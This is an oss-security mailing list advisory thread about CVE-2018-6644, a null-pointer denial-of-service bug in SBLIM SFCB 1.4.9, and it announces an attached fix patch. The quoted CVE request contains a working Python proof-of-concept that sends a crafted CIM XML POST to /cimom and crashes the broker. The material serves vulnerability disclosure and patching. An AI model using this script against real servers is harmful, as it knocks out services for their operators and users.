Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 9 Feb 2018 10:34:44 +0100
From: Marcus Meissner <meissner@...e.de>
To: oss-security@...ts.openwall.com
Subject: Re: Fw:Re: [scr459004] sfcb - 1.4.9

Hi,

Patch from our sblim-sfcb maintainer Adam Majer to fix this issue is attached.

Ciao, Marcus

On Wed, Feb 07, 2018 at 01:04:18PM +0800, XinleiHe wrote:
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> -------- Forwarding messages --------
> From: cve-request@...re.org
> Date: 2018-02-06 04:11:55
> To:  hxl1999@...h.net
> Cc:  cve-request@...re.org
> Subject: Re: [scr459004] sfcb - 1.4.9
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
> 
> The CVE ID is below. Please inform the software maintainer that the
> CVE ID has been assigned.
> 
> 
> > [Suggested description]
> > SBLIM Small Footprint CIM Broker (SFCB) 1.4.9 has a
> > null pointer (DoS) vulnerability via
> > a crafted POST request to the /cimom URI.
> > 
> > ------------------------------------------
> > 
> > [Additional Information]
> > You can use following python code to reproduce this vulnerability.
> > 
> > import httplib
> > from xml.dom.minidom import Document
> > class write_xml(Document):
> >     def __init__(self):
> > 
> >         Document.__init__(self)
> >  
> >     def set_tag(self,tag):
> >         self.tag = tag
> >         self.cim = self.createElement(self.tag)
> >         #self.setAttribute("encoding", "utf-8")
> >         
> >         self.cim.setAttribute("CIMVERSION", "2.0")
> >         self.cim.setAttribute("DTDVERSION", "2.0")
> >         self.appendChild(self.cim)
> > 
> >         self.msg = self.createElement("MESSAGE")
> >         self.msg.setAttribute("ID", "4711")
> >         self.msg.setAttribute("PROTOCOLVERSION","1.0")
> >         self.cim.appendChild(self.msg)
> > 
> >         self.sim = self.createElement("SIMPLEREQ")
> >         self.msg.appendChild(self.sim)
> > 
> >         self.ime = self.createElement("IMETHODCALL")
> >         self.ime.setAttribute("NAME","EnumerateInstances")
> >         self.sim.appendChild(self.ime)
> > 
> >         self.local = self.createElement("LOCALNAMESPACEPATH")
> >         self.ime.appendChild(self.local)
> >           
> >         self.names1=self.createElement("NAMESPACE")
> >         self.names1.setAttribute("NAME", "root")
> >         self.local.appendChild(self.names1)
> > 
> >     def display(self):
> >         print self.toprettyxml(indent="   ")
> >     def retdata(self):
> >         return self.toprettyxml(indent="   ")
> > 
> > def httpreq(data):
> >  conn = httplib.HTTPConnection("127.0.0.1", 5988, False)
> >  conn.request('POST', '/cimom',data)
> >  res = conn.getresponse() 
> > 
> > def main(): 
> >  wx = write_xml()
> >  wx.set_tag('CIM')
> >  print wx.retdata()
> >  print httpreq(wx.retdata())
> > 
> > if __name__=='__main__':
> >  main()
> > 
> > ------------------------------------------
> > 
> > [Vulnerability Type]
> > Buffer Overflow
> > 
> > ------------------------------------------
> > 
> > [Vendor of Product]
> > SBLIM project
> > 
> > ------------------------------------------
> > 
> > [Affected Product Code Base]
> > sfcb - 1.4.9
> > 
> > ------------------------------------------
> > 
> > [Impact Denial of Service]
> > true
> 
> Use CVE-2018-6644.
> 
> 
> - -- 
> CVE Assignment Team
> M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
> [ A PGP key is available for encrypted communications at
>   http://cve.mitre.org/cve/request_id.html ]
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
> 
> iQIcBAEBCAAGBQJaeLorAAoJEHb/MwWLVhi2xdoP/2OaKyQzIatRABkB35IlzYpR
> vkjtDA8uXjMIcnuJr/sYa/zVFjIBRFQ2nLRkJs2d5Ni1uNsZ3hGm5A7Tn3RFsEby
> tL6CvtY8h0MBf4xf6ZVdkzwshJyb05qaOB7UfUL5Fskzoxvs2QpcbGKGtbtaKbPU
> YZq4t6aIyZW9UMEwheeCBDzGqC/oLVRUxgztgAy8SIhIlVfwtYEmHvafs11cN2XV
> EjVvIbaOeRlOfelJvlSKCOjHj0vjOesouiGlMLm3nqYXm5en/T66tuCpaajn4zzO
> I/Wj0Fm8tm2w0pkdfcNBewLu7+4bjRsiJ8U0SVPFQaOENvK7C3q6NyrfCgs1qesR
> fr4LS9TfOcuuIjxn9w3T0Hr4nOAJnSwTiwmnuKoQblA/Pn/r8CquyKh/Rh/ST6P7
> YxLUt9ZzXKf2SlWV1q+68N9RvefoXQFgQdAP2eUG0Y2i8ACZmxCPVLMclwUHvYIG
> KFlei2bIp4IADt3zRdndQBzEK1NwFhNwIKSnE7ybRQqFx6yTgoEiOP0CpYZLmRqi
> g94pvunSBKqPcCNhW/C78orO0Tz7UegnkaBMNYgIgW/jCFEiFGSBgi4VIjW8WWrr
> M+BM/UGehRBbGjmRqphsOBHdc1H9VKUAWJ0Y4hzQAd5Y6QCcTWb0uMlbNMjINshR
> 4TNbCFPf5EWJy7Bw8Gic
> =q5wy
> -----END PGP SIGNATURE-----

-- 
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi. 3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <meissner@...e.de>

View attachment "set_default_content_type.patch" of type "text/x-patch" (2190 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.